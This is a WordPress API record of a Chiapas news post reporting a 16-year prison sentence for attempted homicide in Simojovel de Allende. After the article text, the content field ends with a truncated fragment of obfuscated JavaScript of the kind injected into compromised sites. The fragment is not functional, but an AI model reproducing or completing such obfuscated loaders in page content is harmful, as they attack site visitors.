{"id":22865,"date":"2025-07-07T04:34:29","date_gmt":"2025-07-07T04:34:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22865"},"modified":"2025-07-07T04:34:30","modified_gmt":"2025-07-07T04:34:30","slug":"poder-judicial-del-estado-dicta-sentencia-condenatoria-por-el-delito-de-homicidio-en-grado-de-tentativa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22865","title":{"rendered":"Poder Judicial del Estado dicta sentencia condenatoria por el delito de Homicidio en Grado de Tentativa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"825\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000208328-1024x825.jpg\" alt=\"\" class=\"wp-image-22866\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000208328-1024x825.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000208328-300x242.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000208328-768x619.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000208328.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Sentencian a Javier \u201cN\u201d por su responsabilidad penal en los hechos ocurridos en el municipio de Simojovel de Allende, Chiapas.<\/li>\n<\/ul>\n\n\n\n<p>6 de julio del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria contra una persona del sexo masculino por el delito de Homicidio en Grado de Tentativa, cometido en agravio de una persona del mismo sexo con identidad reservada.<\/p>\n\n\n\n<p>Tras los hechos ocurridos en el municipio de Simojovel de Allende, Chiapas, el Juzgado de Control y Tribunal de Enjuiciamiento de San Crist\u00f3bal resolvi\u00f3 imponer a Javier \u201cN\u201d la pena de 16 a\u00f1os y ocho meses de prisi\u00f3n, conden\u00e1ndolo adem\u00e1s al pago de la reparaci\u00f3n del da\u00f1o.<\/p>\n\n\n\n<p>Lo anterior, derivado del desahogo de pruebas realizado por el \u00f3rgano t\u00e9cnico de investigaci\u00f3n y acusaci\u00f3n durante las audiencias orales, donde se logr\u00f3 acreditar la participaci\u00f3n y responsabilidad penal del hoy sentenciado.<\/p>\n\n\n\n<p>Con esta sentencia, el Poder Judicial del Estado, con la firme convicci\u00f3n de que la justicia es la paz, reafirma su compromiso con una impartici\u00f3n de justicia m\u00e1s humanista, en donde las personas que laceren el tejido social no queden impunes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. Sentencian a Javier \u201cN\u201d por su responsabilidad penal en los hechos ocurridos en el municipio de Simojovel de Allende, Chiapas. 6 de julio del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria contra una persona del sexo masculino por el delito de Homicidio en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22866,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22865","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22865"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22865\/revisions"}],"predecessor-version":[{"id":22867,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22865\/revisions\/22867"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22866"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}